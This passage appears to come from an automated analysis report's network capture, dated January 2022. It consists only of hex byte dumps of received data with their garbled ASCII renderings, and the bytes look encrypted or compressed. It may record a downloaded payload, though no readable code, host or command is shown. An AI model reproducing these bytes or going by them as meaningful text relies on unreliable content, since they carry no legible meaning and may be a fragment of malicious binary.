              Data Ascii: aU'kv*v]NBp(1uJ5;Y!r=lLSyYnQK5$;Wtxrm%4D]b?`jD^OaN[~v|-\m0LoD`Y[^%bI <h=micCod'C24ea&
              2022-01-14 10:25:31 UTC198INData Raw: c7 4b b4 8b 16 c0 3b 03 88 79 ca f8 e1 c8 58 56 45 da 82 2a e1 2d b1 eb ad 44 a3 57 f0 51 a4 ac 99 79 92 29 79 ce 22 86 9a 0b 1e 06 57 53 ba 99 75 66 9b c5 94 4d 81 02 54 48 50 95 c2 f4 0e 04 69 2e 4d 2d db b7 06 91 71 32 7d 2e 9e 9d d7 65 3d 57 96 cb b8 7d 2c a1 ec 6e 82 fc 63 26 b6 78 bf c0 56 3f 54 fc 77 27 5b 6e 81 04 ac ef 40 77 ce 42 6a c2 3c cc bd 03 6c ad c6 a4 83 a3 58 36 17 54 ce f3 92 07 a9 77 f2 75 b6 1d 5d 97 ba 28 ac c9 e5 33 88 95 77 b8 2a f3 94 5a 53 31 10 5b b9 2a 8e ac 6d 06 dc 71 cb 3d bf 2e 2a 92 7e 39 d7 c5 68 a8 9f 96 50 22 fb d2 b4 62 c1 ed 82 bf 9b a2 94 e1 26 2b ed 6a 5f 81 7c 96 bc 44 3d df eb 01 78 65 48 cc 67 8f a0 c0 b3 a1 a8 bd c8 e1 38 67 a7 44 68 07 c9 30 5d 96 7f 92 29 b7 5f 05 c4 32 37 b1 cb 52 fb 92 02 1a af d0 c1 fb db
              Data Ascii: K;yXVE*-DWQy)y"WSufMTHPi.M-q2}.e=W},nc&xV?Tw'[n@wBj<lX6Twu](3w*ZS1[*mq=.*~9hP"b&+j_|D=xeHg8gDh0])_27R
              2022-01-14 10:25:31 UTC202INData Raw: 26 c9 94 b7 f9 b1 d5 5a 0d bc 85 a8 5d 20 04 09 6e 06 bc 3f 5b ee c5 35 ca 81 61 4d 9d 9f 90 79 cc 3b a4 72 33 2d bd f5 51 80 18 f5 bf 2a 0f c7 bc a7 fe 28 c2 d6 04 5a 10 97 2e 36 34 53 48 ab 25 72 89 a2 66 32 c4 1c 60 31 b2 23 18 1f 36 db 98 ae 70 5a 54 46 82 3a e3 4d 91 cf 76 4b 0e 5c c7 eb 5a 90 6a 88 53 16 08 14 ca ba 46 cd 6c d2 fe ee 60 81 65 5b a1 f7 84 08 f1 ae 59 c9 0e d6 87 9b f7 36 22 61 08 74 1e a3 ed b1 c3 00 fa 61 1a b9 97 28 a6 24 6f ac 90 b0 c1 b2 8c e2 be 7c be 0a 8b 39 35 83 fd 49 a9 f0 91 bc 79 16 ff 0d 12 b4 f1 69 93 3b 02 6f 9a af a2 fc 76 85 4b d7 54 96 65 8e 68 86 2f bb ec f2 46 33 24 61 56 c9 91 66 13 66 d9 28 4d 8c 61 e9 b2 5b 19 90 f0 d6 f1 07 c0 a6 45 74 bc d4 15 5a e3 94 b7 cf 02 44 a8 f7 db 7b 7b 28 52 91 92 3c 80 a8 cb 2b c5
              Data Ascii: &Z] n?[5aMy;r3-Q*(Z.64SH%rf2`1#6pZTF:MvK\ZjSFl`e[Y6"ata($o|95Iyi;ovKTeh/F3$aVff(Ma[EtZD{{(R<+
              2022-01-14 10:25:31 UTC206INData Raw: 04 13 5e fc 79 41 e1 b9 3d 5c f1 d3 59 26 7e 8e da 76 ca ac 2c 7f 2b 1a 2f 55 95 6e 5b 0a 49 bd 06 9f e0 b6 29 b6 5d 02 83 7b 20 7e 42 2b b4 b8 4f 86 a4 f7 da ab f0 e6 6a ae c5 ac 1e b9 39 12 16 4d 68 fe 24 a0 da a5 b1 87 82 15 1d 47 2d 90 bb 78 38 00 6a e3 54 27 ac 38 96 19 6c 27 40 cc aa a7 0d b4 50 b8 87 43 08 49 7f 94 d2 40 c9 a2 96 d7 28 99 1d 96 d3 8d c1 f3 13 08 62 91 11 5d 4e a2 05 34 9f 06 21 2f 53 03 48 cd b4 a1 ce aa 65 33 ef 65 ba f8 54 33 a1 46 17 b5 a9 e7 ef a2 09 bd a2 33 da 8b f9 c5 5a aa 18 15 8b 51 ef 1b 55 dc b7 61 68 eb be 19 a5 4c c2 47 e3 83 b7 77 36 fe 68 c2 d4 be 1b 91 58 54 b2 4e e3 1f 60 11 3f 77 36 9c d9 73 aa 47 cf 7a ba 66 1b db fc 06 67 58 e1 c6 47 e5 93 c8 24 8d d2 ae 77 ed e6 4e a1 a4 16 36 c1 88 52 a2 87 d4 c8 85 46 b7 43
              Data Ascii: ^yA=\Y&~v,+/Un[I)]{ ~B+Oj9Mh$G-x8jT'8l'@PCI@(b]N4!/SHe3eT3F3ZQUahLGw6hXTN`?w6sGzfgXG$wN6RFC
              2022-01-14 10:25:31 UTC210INData Raw: 80 e3 eb 49 2e 51 ad 0d 94 5e e4 3d cd 54 6c 18 5f f7 6d ac d3 f4 61 b4 b1 3b c8 c6 93 5d 39 fe 3f 78 53 3d e2 fe bb 8e c8 39 5e c6 02 4a c9 7c b6 a3 43 6e 8a 4b 94 7e b8 06 b3 95 ab 6d 32 4f c4 ad 8e e6 e0 09 ae 59 52 ad 29 a0 66 89 23 e7 18 55 d1 b7 94 2b a0 7d 7a 4e ae 38 c6 ba f4 70 ca 9a 89 e2 a5 71 f9 4e 47 a4 e6 ff 45 14 38 6e f6 18 6c f5 b8 7a 41 f9 b4 6b d8 5a 41 76 f8 90 90 18 5e be f1 1a 34 11 4b f1 e5 2e a7 76 3a 4c 3c 08 22 e7 35 47 8c cc df 62 89 0d 18 95 bb 71 d5 1e 45 38 f6 e2 49 e9 90 ee 9a f2 09 a7 3c 49 5b 9b b6 f5 29 12 58 01 d1 aa c4 1c 84 23 fc 67 20 a1 5c 2d f3 91 72 62 ad a6 8b b5 b0 b1 35 a7 dd f2 cb 05 4a 93 c8 e9 ac 51 36 93 ab 4b 08 99 f3 81 e8 51 f0 bc 0c f8 7c 55 ef f8 c5 35 50 c0 21 cd e6 75 1f 07 8f 60 ce 22 42 a5 de 1e d6
              Data Ascii: I.Q^=Tl_ma;]9?xS=9^J|CnK~m2OYR)f#U+}zN8pqNGE8nlzAkZAv^4K.v:L<"5GbqE8I<I[)X#g \-rb5JQ6KQ|U5P!u`"B
              2022-01-14 10:25:31 UTC214INData Raw: f0 32 80 62 ca b8 25 d4 cd ae 17 41 53 1e 16 f5 f5 d0 0c 63 d9 6e b3 92 52 04 66 28 a2 89 06 04 73 1a ff fd 71 bb 0b eb 2a b0 8b 7f a8 e1 47 6a 94 d6 a5 5b 29 ba ec 2b 8d cc b0 97 fb 81 56 80 96 1d cf d1 fe e9 6c 55 9f 84 f8 f6 72 37 4a 4c 76 55 6d 5d 29 a3 5d ce 6f a9 8f b4 19 d8 bc 91 53 5a a3 36 87 b7 d0 fc 35 8e cb 92 81 16 7c bb 6b 31 ff 5f 93 68 ed 16 92 a6 76 79 48 21 e0 41 e6 a8 c8 9b fa eb 99 d6 88 32 42 5c 6a 72 4f b4 5c c4 f2 c8 bc 85 fd db b9 49 04 f8 ca 83 3a d4 43 6c 50 52 61 60 e4 e6 3b 88 2e 70 5a 85 8c 65 2a b4 80 75 ca f8 70 84 12 34 55 14 2a ac 7f bc 25 db f6 17 34 df ba 14 3e 9d c0 42 0e 81 25 33 fd ad e8 ca dd bd 4d f7 25 30 1c f4 41 70 fb 36 a6 6d 5b 4c 0c d8 fc 01 c9 06 a1 e1 0f 70 09 4e 44 5f 8d f6 16 c2 b6 91 d7 61 8e b9 fc 85 29
              Data Ascii: 2b%AScnRf(sq*Gj[)+VlUr7JLvUm])]oSZ65|k1_hvyH!A2B\jrO\I:ClPRa`;.pZe*up4U*%4>B%3M%0Ap6m[LpND_a)
              2022-01-14 10:25:31 UTC217INData Raw: 42 e2 ec 32 f4 fc 92 d3 29 3b 38 79 5f 9b db ff 6e cf 4f f5 9f a4 a7 3b d5 0f 45 2a d6 e1 a2 c3 f4 11 7a 24 f1 63 75 cd 45 82 74 1b 32 a4 4b 3d 37 8f d8 2f ae 9a 0e d3 dc 43 71 d0 74 a6 b3 60 c8 7c 8d c0 56 bd b9 79 b4 d4 f8 7f fa 57 d1 28 62 b5 68 3a 36 a6 b6 fa 4d c2 28 46 a5 32 fd b8 ab 67 d7 90 72 cf 87 d5 34 4d c8 9f 7b 20 e3 f0 07 40 7e 77 81 f0 88 e3 67 8a ce af 91 7f 05 88 50 22 57 9c a4 e1 93 93 3d bb db f3 8d 92 d7 4c 8c c1 93 9d 55 13 89 81 ba df 1f ef e4 5b 39 f8 90 24 dd b1 e9 d1 06 e4 25 98 59 c7 5b b1 e6 95 a8 42 05 36 44 39 0a 5f 00 0e f0 c8 40 a3 01 c0 fc 59 a5 6f da 5b f5 01 68 a1 70 8c c7 b6 3a 47 fa 16 f0 7e 87 85 57 c1 19 d2 5e cb ac 03 ea 02 a7 7c 77 4b 73 2a 32 0c 77 66 ec cd a8 e3 9a e5 54 45 39 b6 c1 e9 82 29 78 e4 40 39 68 24 fc
              Data Ascii: B2);8y_nO;E*z$cuEt2K=7/Cqt`|VyW(bh:6M(F2gr4M{ @~wgP"W=LU[9$%Y[B6D9_@Yo[hp:G~W^|wKs*2wfTE9)x@9h$
              2022-01-14 10:25:31 UTC221INData Raw: da 62 ee c5 13 8d e4 35 ea 05 3b c3 e9 98 4a 76 38 20 3a 99 0d bf 6e d7 42 e1 cc 6f 72 bc 8c b9 bd 18 cd 5c 3f 40 08 44 2e 46 d4 e9 35 f1 29 78 c8 d0 f9 bd 58 2a ae 1d 51 bd 4f d3 63 87 98 ec 60 b0 2c a7 98 37 77 f6 67 79 7a d3 96 78 c2 be 1f fe cc ee c6 6a fd 84 61 fc f5 f5 69 c6 ec eb d3 51 97 63 90 c5 1b e8 a1 91 3b 6b 4f 14 1d b1 f9 b1 a2 47 8c a0 d3 ac b3 0b 52 ff 46 df d7 18 03 81 98 36 ed 4c b5 d2 b8 6a 43 9d 78 ae a7 e8 12 42 07 5b 6b bf 17 c8 d2 7c 4f d7 04 e8 38 46 e1 62 f3 3c cd 3f 85 72 bf 1e e3 b7 13 a0 b4 2e 3c d8 4f 1f 14 27 17 55 82 56 aa 03 5b 0d f8 96 bb 6d ea cb f3 1b 0a 46 a5 8d 7c 56 5e fa ff c3 f6 5e 3c b8 66 d7 ca b7 86 f6 a1 66 14 58 97 59 e7 d7 95 ff 1c a2 86 1d fa 42 be 49 37 57 5e 0d bb 75 60 4f 1a 78 b0 20 2d 31 c9 5b b3 78 1b
              Data Ascii: b5;Jv8 :nBor\?@D.F5)xX*QOc`,7wgyzxjaiQc;kOGRF6LjCxB[k|O8Fb<?r.<O'UV[mF|V^^<ffXYBI7W^u`Ox -1[x
              2022-01-14 10:25:31 UTC226INData Raw: f7 34 07 c8 fb 2c 1d 17 ca 18 51 a4 1b 1c 62 7e bf b0 51 a4 6b ea da 75 5b 8e 0e b8 57 97 92 94 0f 36 43 43 e4 5e ac da da 75 67 f3 7a 49 ef c6 42 c5 cd 91 6e 64 79 cb 9b 00 40 ca 39 59 be 32 3d 51 4d ac 20 90 19 21 ad 5a d8 7b 1f 11 c5 a1 ff 21 a8 e1 80 be 4b b3 48 3a c5 a1 64 78 6a 6f dd ed 49 b2 05 c8 5c 09 74 52 6a 68 22 8a 7c 43 ab 5b 78 48 74 51 f5 3f 74 50 82 bf fd 20 82 b0 1d 1f 9f 7f 1b 16 86 a5 43 49 8c aa 1d 1c 4a 3f 95 06 a1 78 b6 cf 09 cf 28 f4 15 22 cc 18 63 f1 36 ed 4a 39 ee 46 58 1a 94 af 6b d5 7f 01 eb a0 ca 27 3e ce c6 21 c0 2e 13 2d 92 94 69 ef 38 db 96 8b 49 b6 cd 90 d1 88 ff 21 ae d4 ad 5a ab 5e 78 4a ef c3 70 5a e7 dd 9e ff 57 92 ec 48 44 c4 25 00 53 a5 62 7b cb 93 02 56 0d 3e d6 78 72 5d 4a 32 e6 5c 2b 7f 93 15 5e 00 5b 86 73 d1 78
              Data Ascii: 4,Qb~Qku[W6CC^ugzIBndy@9Y2=QM !Z{!KH:dxjoI\tRjh"|C[xHtQ?tP CIJ?x("c6J9FXk'>!.-i8I!Z^xJpZWHD%Sb{V>xr]J2\+^[sx
              2022-01-14 10:25:31 UTC230INData Raw: 10 ab 5f a6 ea 76 50 0d 39 76 50 15 2b 4f aa e0 64 a5 69 18 a1 88 a9 9e f9 b3 48 bf b3 c0 2d fb 2f fc aa 48 3b ca 1b a3 6d b5 44 96 88 f1 c1 f3 3e ad 5b e9 d0 60 00 38 d8 0a 42 be 30 f6 b4 e6 59 a1 70 68 72 60 00 68 75 17 21 c9 9e 31 6f 2d 70 88 ae 21 0a ca 1c 16 a3 fd 23 9d 78 d5 84 2c f2 1c 9d db f6 1c 9d cf 89 7b c3 cb 92 f3 39 32 ed a4 e8 25 01 a2 f5 42 c1 d3 80 bf b4 c2 2e d9 f3 06 4e 14 ae 15 2c 31 6e af 51 6b ef 15 2c 21 0b e4 5b 6d e3 62 7b 54 18 35 67 68 74 c8 19 83 30 4a 31 c0 2b d7 fe 16 a2 4a 31 30 e8 3d 55 f4 be 40 cf fa ab 26 86 d0 0e bb bc 30 e8 5d 8c b2 c8 2f 69 2c f0 83 33 ad 5e c8 1a 4d ab 8a a0 2e f4 64 7c a6 ee a3 68 fa a8 7c 43 e0 61 26 85 9a 84 1c 9f c4 23 bd b3 f0 42 7a 4f ef c0 49 b0 a5 6c 13 2b 07 ce 0c bb be 35 69 e9 dc 76 41 41
              Data Ascii: _vP9vP+OdiH-/H;mD>[`8B0Yphr`hu!1o-p!#x,{92%B.N,1nQk,![mb{T5ght0J1+J10=U@&0]/i,3^M.d|h|Ca&#BzOIl+5ivAA
              2022-01-14 10:25:31 UTC234INData Raw: 8f 4a 6a 3f 01 85 68 3c 89 47 fc e4 04 05 a2 ce 30 d2 39 12 e1 af 04 33 32 b5 11 59 d9 ad 20 ae e9 ec 72 07 98 d4 51 da 26 dd b2 9d 0f 09 fb 13 77 8a eb b6 97 57 cb c6 52 1d 28 c0 11 6e 34 b7 11 4c 7c 1b 56 52 6f b4 a0 ca 27 3e 94 ca 55 e2 30 b3 01 9e b7 14 c2 15 16 98 d6 2d 22 c7 c3 f2 d3 d7 a5 36 b6 8f 4d e0 1b 46 79 9d 2f 31 3d 1b 4a 65 8e a2 ce 30 d2 57 c7 c9 d1 d5 da 19 73 87 70 09 8f 4d e0 1b 51 fe ee 19 5a 2f 50 19 1f 42 95 5b c5 ff 79 a7 35 3c 8f 4d e6 0c f0 38 81 73 87 76 21 31 54 22 dd be 65 b3 17 7f 52 71 83 69 b9 f5 6f af 28 a5 21 54 4e 71 a6 d7 c4 1a a1 20 c2 71 cc 19 2c a5 30 bc 7a 13 79 f4 84 8c 9e c5 98 25 8a 99 3a e8 69 d0 30 4f 01 ea 6e 5b b1 70 64 d8 c2 15 12 12 fb 13 16 05 95 32 d2 a4 81 05 f7 96 f4 84 88 08 53 9f 4c 8d 34 db c9 39 98
              Data Ascii: Jj?h<G0932Y rQ&wWR(n4L|VRo'>U0-"6MFy/1=Je0WspMQZ/PB[y5<M8sv!1T"eRqio(!TNq q,0zy%:i0On[pd2SL49
              2022-01-14 10:25:31 UTC238INData Raw: 07 2a 3a 73 2f a6 28 66 9b c0 ee 26 17 e8 9f 2e 6e 94 8d 5d c0 60 63 c3 97 36 28 48 8f e4 9e 76 de ac 1a 3f ec 8d df 1e 6b 28 3f af d5 4d 6d 26 4f 68 b1 8b e0 a7 a6 25 cf 4d 6d 1a 00 cf 4d 69 46 39 99 cf 1f 4d 6d 76 bf 7a 89 a4 09 0d f2 3a 2d 80 a1 23 5b dc cc 2b 47 85 f2 25 9f 86 6f 17 d1 4c ef 32 1d d3 44 32 1d c5 63 59 0e 3d 90 79 21 d5 40 2b 9a 42 05 3e 3e 0e 78 c9 00 ae 16 52 bb b0 12 3a 08 24 48 b4 2a 36 20 44 14 7a 80 48 cf 77 cd c5 f7 67 42 fa 91 29 b9 25 9c 01 15 e4 95 ca d8 b2 07 0f f6 6c b7 8c 61 11 bd 4d 6d 08 be ea 91 e3 17 e5 1c 6a 9b c0 ee ea c3 5f 45 ac 54 3c 13 79 12 dc b0 53 7e 8c 61 5c d7 28 36 1c 64 87 31 3c 84 e4 e6 65 c7 a0 29 22 d3 c1 6c a8 23 ca d8 b9 7e 80 7c 8d d3 44 01 3a 53 63 3c 56 97 c9 5a 8f 85 f1 02 d1 01 15 e9 98 25 a5 aa
              Data Ascii: *:s/(f&.n]`c6(Hv?k(?Mm&Oh%MmMiF9Mmvz:-#[+G%oL2D2cY=y!@+B>>xR:$H*6 DzHwgB)%laMmj_ET<yS~a\(6d1<e)"l#~|D:Sc<VZ%
              2022-01-14 10:25:31 UTC242INData Raw: 4c ef 65 14 6b 2a 5a ff e3 21 d0 c4 e5 1c 5a d3 44 01 1c 5f 45 7f ea 98 45 7f ed 02 92 54 cc d3 44 01 0b e7 0c 7d 4b 39 d1 49 48 c6 df 2a 7b 46 bd d5 dc 2c aa e0 a7 a6 28 c0 11 0d 04 71 e2 5c 33 54 22 b3 74 54 22 b3 74 17 1a a1 4c a6 c7 b0 f4 6f 8d 70 16 67 65 6e 93 d2 e6 ba f6 77 06 9c 3e 0e 66 a8 23 ca fd c2 ea 91 e6 aa 1f d3 7d 3a 17 e5 4f 3b 84 71 99 41 ce d8 0c c8 42 09 9e b5 02 93 52 89 b0 12 2c 7e b4 09 1f c4 f7 f4 72 9f b7 82 7f fc 69 2f ab 9d bc f7 f0 84 73 19 e6 9a 42 05 16 70 8b e4 b5 ac 31 ab dc f1 43 b9 ee 18 f2 9e 87 51 d9 c8 dc b0 12 8f 24 b7 7d fc 96 b4 f6 89 17 1a a1 42 fa 91 29 74 68 4e 14 e4 61 be 0c 1f 2c c9 a5 9f 60 14 a9 b2 a0 98 c1 64 3e 8a 39 98 18 3d a9 a0 6c f1 2c 34 4d 04 b4 02 1d 59 32 0b 50 49 fe 01 c9 86 a6 53 9f 48 07 60 3e
              Data Ascii: Lek*Z!ZD_EETD}K9IH*{F,(q\3T"tT"tLopgenw>f#}:O;qABR,~ri/sBp1CQ$}B)thNa,`d>9=l,4MY2PISH`>
              2022-01-14 10:25:31 UTC246INData Raw: 3a 2f 97 f1 02 b5 a1 95 cd 74 b2 28 3f b3 b4 36 97 4e 6c 2f 50 e6 9a 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 6e a4 2c cf b2 f2 80 9f 48 07 f7 a5 01 be 72 9b 54 49 16 67 59 38 28 3f b6 3e 08 86 5c ff e3 21 e3 0c 7d 03 38 32 29 bd 51 40 0a 81 e4 80 7c 85 eb 15 e9 13 fb fa 6e a4 3c 03 11 f2 61 5f 48 f8 3d df 19 e0 3e 97 af 94 ce 4f 24 48 5d 04 85 f1 a7 ee 88 6a 08 ce cf 4d c8 94 50 e6 3f c4 e5 1c fc 21 ce cf e8 de ac 1a fb a4 2c 36 9b 8f db 32 ef 55 5b 4e 3a 41 87 ec 6c f4 7b 07 e5 7c 85 f1 f1 60 c3 68 1a 14 6b 2a 9f ff e3 21 fa 73 12 70 87 f4 63 3c 5c 83 ba fb 8c 01 75 14 47 56 f5 f9 b0 52 a2 86 e7 90 d1 b6 04 8f db cd ae e9 ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b0 ed f4 84 86 90 a6 d7 fc 8b 06 59 4f c9 fb 9a 42 8e d6 ee 88 3a 47
              Data Ascii: :/t(?6Nl/PB)B)B)B)B)Bn,HrTIgY8(?>\!}82)Q@|n<a_H=>O$H]jMP?!,62U[N:Al{|`hk*!spc<\uGVRrdE~n[YOB:G
              2022-01-14 10:25:31 UTC249INData Raw: e1 57 77 10 38 4d 6d 26 45 60 c3 68 b1 82 78 8e 1f 91 d6 bd 27 93 d2 c6 ad d4 c2 ea d7 7d 03 11 b3 ca d8 b9 44 3b 95 cd 65 0c 7d 03 22 7f fe 65 5c a8 10 74 2e bb e5 1c a6 4e 14 6b f8 3a f6 77 b6 2f 6b 2a 9c 15 2d b4 af bf b4 09 a2 1a 9a 42 3d 8c 61 41 bf 6c a8 23 f2 63 3c 13 c5 42 1f d3 67 10 57 57 76 b3 aa 1f cc cb 49 76 8c 7f e0 a7 f2 2b ec 3a 8f 43 1b 23 ca d8 b9 81 05 f3 02 48 07 f7 0b 85 0e 87 13 f6 cf f5 6d 26 15 bf 49 76 92 54 dd 2e 32 29 bd 75 14 6b 2a 3a 17 e5 1c 59 52 e2 a3 ae 16 67 33 a6 28 3f 8c 61 41 86 6f 22 4c e0 a7 a6 28 23 ca d8 bc de ac 1a 4b 4b 71 1d c5 58 d5 40 0a a7 a6 28 3f 96 4b 71 31 98 47 7a d7 65 38 1b 84 2b b8 00 c5 31 ab 9d f0 c8 dc b0 54 9b c0 ee c9 1b dc b0 28 05 0c 7d 37 aa 1f d3 37 ed 4b 71 d1 36 92 54 22 2a c5 63 e6 d4 25
              Data Ascii: Ww8Mm&E`hx'}D;e}"e\t.Nk:w/k*-B=aAl#c<BgWWvIv+:C#Hm&IvT.2)uk*:YRg3(?aAo"L(#KKqX@(?Kq1Gze8+1T(}77Kq6T"*c%
              2022-01-14 10:25:31 UTC253INData Raw: 69 f0 7b f8 8d 30 d2 39 66 61 41 19 df 2a ba 04 70 e0 27 3e f1 fd 67 cc 2b 47 fa 91 29 42 05 f3 02 ec 8d 20 ae 69 af 6b d5 3f 4c 10 8b 9b 00 68 4e 94 d0 34 db 4d 8d 20 ae 69 df d5 bf 0f 0e 87 13 92 a8 dc 4f 17 19 1f 2c 49 88 95 32 56 27 3e f1 7d fc 96 b4 76 6d d9 c8 a3 51 9b 3f f3 02 6c 57 28 c0 11 0d 84 8d 20 ae 69 d1 b6 fb 93 2e cd ae 69 d3 bb 86 10 8c 9e c5 5c 3c ec 72 a4 cc 2b 47 65 b8 3f 74 98 47 7a 09 03 ef f8 8c 9f 49 88 94 ae e8 22 f8 c6 55 a5 54 76 26 ed bf c4 51 d0 35 5c 32 d7 c5 9d 42 fb 12 8e a3 50 18 9c c0 10 8a d2 cd 5b 41 95 7c 8f dc 2b 24 df b8 8e d3 c1 e9 82 e3 5d 35 de eb a9 e6 64 44 ff 1d 29 43 7d fd e1 82 6b 39 30 dc 07 0c dd b2 9a cd de 25 4c 6e 25 b8 77 67 58 bb 24 06 cd af 6a 53 9e c4 1b 22 4d 6a be 41 3f 30 ed e1 b2 9a cd d8 30 ac
              Data Ascii: i{09faA*p'>g+G)B ik?LhN4M iO,I2V'>}vmQ?lW( i.i\<r+Ge?tGzI"UTv&Q5\2BP[A|+$]5dD)C}k90%Ln%wgX$jS"MjA?00
              2022-01-14 10:25:31 UTC258INData Raw: fe 3b cb 08 d6 a8 35 b5 9f bc 09 fa 90 a7 0c a5 6b 0a a1 93 f2 5f 65 18 99 38 e1 df d3 bd 8f 21 3a fd 02 73 c0 3d 5c 06 4c 3f bf 5f 68 9b ea bb 53 3e 50 b8 50 f3 e8 80 6b 21 30 d3 ba 05 04 31 64 9a 62 9e 1a 7e a0 15 c9 a1 41 7d fa 97 30 db dc 5d a3 4b 91 0f 25 09 ce 15 d9 18 4f 43 a8 08 ad ff 84 14 3b 80 69 3a 01 1e ab 63 c2 14 95 cc 08 32 09 24 68 91 f6 57 77 30 e7 c9 ac e9 f0 63 d7 d5 ad 72 7e 60 1a 8d 4d f4 54 f2 51 48 d4 ee a4 4b 16 00 c7 4b 64 af 81 f0 7a 77 ee 76 6c 02 5b 81 da 95 ed 2b 98 67 13 58 1c 92 85 26 98 a4 cb bd 9b 2d 5e 22 ac c3 f2 49 59 7d 2d 99 e8 bb 54 ba 9c 59 02 a4 38 be e2 a9 5f bb 87 12 8e a3 af 48 75 34 04 af b4 29 9d 05 ca 11 39 48 2f 74 74 70 74 79 e6 70 7a 56 38 34 0b d0 e5 32 07 26 6d 40 6c ce a1 16 6b 23 da bf 8e a3 50 18 9c
              Data Ascii: ;5k_e8!:s=\L?_hS>PPk!01db~A}0]K%OC;i:c2$hWw0cr~`MTQHKKdzwvl[+gX&-^"IY}-TY8_Hu4)9H/ttptypzV842&m@lk#P
              2022-01-14 10:25:31 UTC262INData Raw: 59 da 3d 18 ea 19 68 39 11 7a 01 9d 34 ac 92 dc 38 63 d3 ab 72 74 78 61 be 0c 82 87 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 52 0d 14 84 9c d1 a6 c7 b0 fd 08 69 c0 01 fa 81 15 06 65 d7 d4 2d 5b a1 5c 23 25 2a d5 af 7b e8 79 e4 71 f2 90 b6 eb e0 48 17 0a 6e 4b 9e d5 af 7b e8 79 f4 84 8c 9e 3a 17 e5 e3 de ac 1a a1 b3 74 97 36 df d5 40 f5 f9 f0 7b f8 8d df d5 bf 70 60 3c ec f2 00 e8 69 10 4b 4e 14 94 2f d0 34 5b b1 f0 7b f8 8d a0 ca a7 d9 c8 23 35 dd d1 b6 7b f8 8d 20 ae e9 ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 83 0a 7e 7f 05 f3 03 ee 77 ef 99 3a e8 69 e0 58 2a c5 b4 f6 88 95 32 d6 42 fa 9b 32 e8 10 e7 85 63 a6 a4 a0 ab 4d ae e3 d3 85 60 53 f6 fc f7 68 27 52 6d a9 3f 49 ba 72 09 88 f4 ab 5e 32 db f3 71 85 60 55 d0 40 90 f5 75 9c
              Data Ascii: Y=h9z48crtxa$}2Rie-[\#%*{yqHnK{y:t6@{p`<iKN/4[{#5{ rdE~n[p`<rdE~w:iX*2B2cM`Sh'Rm?Ir^2q`U@u
              2022-01-14 10:25:31 UTC266INData Raw: ad 7f 81 05 f3 b0 61 be 0c 9a c5 9c c1 8b 4f 97 36 6d b5 78 71 f5 da 4a 0b 15 6a 52 1d 9a dd d1 b6 ee 01 ea 6e 4f 6f dd d1 04 20 ae e9 f8 62 41 78 65 bf 8f 24 05 7f 01 ea 7c ab 62 41 6a 72 64 45 32 5a 2f 50 08 0f 09 fb 02 3c ec 72 d6 8a 99 3a f9 2b 47 85 1e 3a e8 69 64 89 17 1a b1 f8 8d 20 be 1c a6 d7 c4 1a a1 4c 10 8b 1b 23 35 5d b6 fb 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 29 42 fa 91 28 c1 92 aa e1 25 c5 63 3c ec 72 64 44 fe 9a bd 8a 99 3a e8 69 2f af bf e9 3e d1 eb 3d 6f dd fa 08 54 fd ba 36 df d5 bf 8f
              Data Ascii: aO6mxqJjRnOo bAxe$|bAjrdE2Z/P<r:+G:id L#5]$}2B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B)B(%c<rdD:i/>=oT6
              2022-01-14 10:25:31 UTC270INData Raw: a5 56 46 07 87 16 98 ad 66 58 2a c3 88 8c 9e c5 cc 3b aa f2 50 0d e4 77 1f 34 db d9 c9 86 90 bd be 2f 50 05 97 15 16 85 7a 55 a4 de 70 61 ee 7c 1a ad 17 17 da 45 50 08 99 29 b2 e7 35 41 78 66 7d e0 58 20 b2 f3 72 74 a8 ce e0 4c f0 6d 29 5a bd 96 b4 e6 51 87 13 03 ba 18 9d 51 ff 00 68 42 e6 64 35 4d c0 05 f3 0b 34 cf b2 f8 d9 dc 4f 9c a5 41 78 79 e0 59 dd c1 73 f4 74 7c 48 1f 2c c0 25 22 b3 7e 2b 5f ba 0f 6d c1 93 27 26 bd fa 9a 5d bb 76 62 73 f5 06 7c 4e 07 f7 01 8e b1 70 68 5d b7 7d fc 86 c0 11 0d 9f 60 3c ec 22 a7 b9 97 c6 06 77 e3 df f9 0d 14 a0 e6 67 dd b5 54 20 bc 7c 56 24 a4 07 db cd a3 6c 4e 14 94 ae 49 89 17 81 2d 4b 8e f2 90 a6 e1 db d3 bb bf bb 98 b8 c5 f8 93 2d 70 14 8a 99 33 76 74 68 4e 15 76 6d d9 53 b7 7d fc c6 0e 87 3d 6e 40 f5 37 55 bf 8f
              Data Ascii: VFfX*;Pw4/PzUpa|EP)5Axf}X rtLm)ZQQhBd5M4OAxyYst|H,%"~+_m'&]vbs|Nph]}`<"wgT |V$lNI-K-p3vthNvmS}=n@7U
              2022-01-14 10:25:31 UTC281INData Raw: fa 91 29 55 d8 53 60 cc a0 01 61 f6 88 95 25 ad 72 9b 1e de 88 10 c3 68 b1 e7 11 e5 f3 4d 1f 64 2b 32 d1 3f 72 8c 1d 2f db 16 ab 60 48 f8 72 9b 40 5c 33 59 ad d5 3a e7 e7 e7 e7 67 f1 e9 98 78 f4 8b 6f dd d1 b7 7f 3c ec 72 7c 79 e1 25 c5 56 a5 95 01 af a0 41 30 2b cc 63 cb f0 f0 33 79 18 1e e2 0b 10 af 1f a5 1d 20 8a c5 15 5e f4 48 cb 65 0b cc e7 18 62 d6 d9 20 ae e9 e4 91 93 2d 4b 8f bc 85 85 46 cf 4d 6d 4e b9 69 d0 34 d3 41 c2 15 16 99 a2 43 f7 43 b0 12 70 f7 d4 d5 bf 8f 25 a2 43 f7 43 b0 12 70 f7 c7 48 07 f7 03 1e 10 8b 1b 22 2b ca ac ad ab 9d bc 9f 96 5c 33 59 a5 a5 ef f9 0f 08 e1 57 23 7d 03 11 f3 7b 11 f2 7f 96 14 7c b4 7d b8 ff 1c bb 2e c8 ae a5 55 a4 d2 a1 c1 18 d5 bf 8f 25 1b 99 c5 63 3d f8 04 7f f7 8e bd 03 a7 